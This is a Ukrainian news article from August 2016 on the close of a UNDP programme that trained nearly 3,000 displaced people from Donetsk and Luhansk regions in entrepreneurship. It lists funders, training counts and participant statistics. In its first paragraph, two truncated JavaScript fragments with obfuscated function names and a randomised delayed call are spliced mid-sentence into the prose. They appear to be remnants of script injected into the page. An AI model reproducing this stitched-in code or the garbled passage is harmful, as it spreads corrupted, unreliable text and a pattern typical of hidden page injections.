В Україні фінішувала навчальна програма ПРООН

25.08.2016

Майже два роки тривала в Україні реалізація навчальної програми «Розвиток навичок підприємницької діяльності серед ВПО та місцевого населення Донецької та Луганської областей», головним ініціатором та натхненником якої виступала ПРООН. У серпні 2016 року проект завершився, залишивши у всіх його учасників щонайприємніші враження, гарні спогади та пристойний багаж знань, який більшості із них неодмінно знадобиться у майбутньому.andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

 

Восени минулого року, коли програма тільки стартувала, ніхто й гадки не мав, що вона замість запланованих чотирьох місяців триватиме утричі довше. Принаймні, саме на такий термін була розрахована фінансова підтримка Уряду Японії.

 

Однак, зважаючи на популярність проекту і кількість бажаючих здобути бізнес-освіту, до його втілення згодом долучилися Міністерство закордонних справ Польщі, Уряди Чехії та Уряд Великобританії. А на завершальному етапі додаткові кошти знову ж виділила Японія. Виконавцем проекту виступила Консалтингова компанія «Територія Бізнесу» (м. Львів).

 

Навчальна програма була розрахована на громадян, яких конфлікт на Донбасі спонукав перебратися у інші регіони України, залишивши на окупованих територіях свої домівки та майно. Серед них – чимало людей з активною життєвою позицією, котрі вважають неприйнятним для себе бути на утриманні держави чи громад. Оскільки ж на новому місці знайти роботу не завжди вдається, вони вирішили зайнятись підприємницькою діяльністю. І навчання за програмою ПРООН стало для них своєрідним трампліном у великий та розмаїтий світ бізнесу.

 

Загалом протягом 2015-2016 рр. було проведено 116 тренінгів у 12-ти містах України, під час яких знання та практичні навички здобули 2956 осіб, відібраних на конкурсних засадах. Серед них переважали жителі Сєверодонецька та Краматорська (відповідно 698 і 734 учасників програми). До речі, жінок, які хотіли б започаткувати власну справу, виявилося більше, ніж чоловіків. Їх було 1696, тоді як чоловіків – 1260. Слід також зазначити, що тренінги пройшли й 135 осіб з обмеженими можливостями – категорія населення, якій зазвичай найскладніше працевлаштуватися.

 

Гарним бонусом для усіх без винятку учасників проекту став також шанс отримати безповоротні кошти на розвиток власного бізнесу за Програмою малих грантів для підприємців ПРООН. І багато хто ним скористався, підготувавши з допомогою кваліфікованих тренерів цікаві бізнес-плани та здобувши перемогу у конкурсі.

 

Навчальна програма ПРООН для вимушено переміщених осіб стала найбільшим освітнім проектом, який втілювався в Україні останнім часом і мав на меті їх максимальну соціальну адаптацію. Оскільки ж його учасники побачили реальну перспективу самореалізації, то є надія, що більшість із них вже незабаром стануть успішними підприємцями, які з упевненістю вдивлятимуться у майбутнє.

Географія навчальної програми

За підтримки:

Приєднуйся до нас на: